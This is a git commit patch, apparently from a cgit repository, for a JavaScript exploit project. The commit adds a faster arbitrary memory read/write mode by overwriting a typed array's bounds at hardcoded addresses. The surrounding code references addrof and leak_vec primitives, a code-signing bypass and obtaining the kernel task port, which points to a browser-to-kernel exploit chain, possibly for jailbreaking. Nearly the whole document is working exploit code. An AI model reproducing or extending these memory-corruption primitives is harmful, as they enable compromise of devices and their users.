From 6d609fb3dc90d646ed25bd89ff9ab37c8b3f9aec Mon Sep 17 00:00:00 2001
From: spv420 <spv@spv.sh>
Date: Mon, 11 Jul 2022 21:19:25 -0400
Subject: faster r/w

---
 src/js/main.js           |  8 ++++++--
 src/js/primitives/mem.js | 43 +++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 49 insertions(+), 2 deletions(-)

(limited to 'src')

diff --git a/src/js/main.js b/src/js/main.js
index 8a13df6..5c45e85 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -77,9 +77,13 @@ function main() {
 	large_buf[0] = 0x41424344;
 	printf("%x\n", read_u32(large_buf_ptr));
 
-	csbypass();
+//	csbypass();
 
-	return;
+//	return;
+
+	setup_fancy_rw();
+
+	printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));
 	
 	var tfp0 = get_kernel_task();
 	
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 0cd2b7d..6e21fb0 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -1,6 +1,7 @@
 var shit_status = 0x144444;
 var global_sptr_addy = 0;
 var VECTOR_OFFSET = 0x10;
+var fancy_rw = false;
 var sptr_size = 0;
 var sptr_len = 0;
 
@@ -8,6 +9,10 @@ var sptr_len = 0;
  *  read uint8_t
  */
 function read_u8(addy) {
+	if (fancy_rw) {
+		return parent[addy];
+	}
+
 	u8x4 = u32_to_u8x4(addy);
 
 	/*
@@ -34,6 +39,10 @@ function read_u8(addy) {
  *  read uint16_t
  */
 function read_u16(addy) {
+	if (fancy_rw) {
+		return u8x2_to_u16([parent[addy], parent[addy + 1]]);
+	}
+
 	u8x4 = u32_to_u8x4(addy);
 
 	parent[VECTOR_OFFSET + 0x0] = u8x4[0];
@@ -49,6 +58,10 @@ function read_u16(addy) {
  *  read uint32_t
  */
 function read_u32(addy) {
+	if (fancy_rw) {
+		return u8x4_to_u32([parent[addy], parent[addy + 1], parent[addy + 2], parent[addy + 3]]);
+	}
+
 	u8x4 = u32_to_u8x4(addy);
 
 	parent[VECTOR_OFFSET + 0x0] = u8x4[0];
@@ -110,6 +123,11 @@ function fast_write_buf(addy, buf) {
  *  write uint8_t
  */
 function write_u8(addy, what) {
+	if (fancy_rw) {
+		parent[addy] = what;
+		return;
+	}
+
 	u8x4 = u32_to_u8x4(addy);
 
 	parent[VECTOR_OFFSET + 0x0] = u8x4[0];
@@ -124,6 +142,13 @@ function write_u8(addy, what) {
  *  write uint16_t
  */
 function write_u16(addy, what) {
+	if (fancy_rw) {
+		parent[addy] = what & 0xff;
+		parent[addy + 1] = (what >> 8) & 0xff;
+		
+		return;
+	}
+
 	u8x4 = u32_to_u8x4(addy);
 
 	parent[VECTOR_OFFSET + 0x0] = u8x4[0];
@@ -140,6 +165,15 @@ function write_u16(addy, what) {
  *  write uint32_t
  */
 function write_u32(addy, what) {
+	if (fancy_rw) {
+		parent[addy] = what & 0xff;
+		parent[addy + 1] = (what >> 8) & 0xff;
+		parent[addy + 2] = (what >> 16) & 0xff;
+		parent[addy + 3] = (what >> 24) & 0xff;
+
+		return;
+	}
+
 	u8x4 = u32_to_u8x4(addy);
 
 	parent[VECTOR_OFFSET + 0x0] = u8x4[0];
@@ -267,4 +301,13 @@ function leak_vec(arr) {
 	var addy = addrof(arr);
 	printf("%x\n", addy);
 	return read_u32(addy + VECTOR_OFFSET);
+}
+
+function setup_fancy_rw() {
+	write_u32(0x422294, 0xffffffff);
+	write_u32(0x422290, 0x0);
+
+	fancy_rw = true;
+
+	printf("%08x\n", u8x4_to_u32([parent[0x5000], parent[0x5001], parent[0x5002], parent[0x5003]]));
 }
\ No newline at end of file
-- 
cgit v1.2.3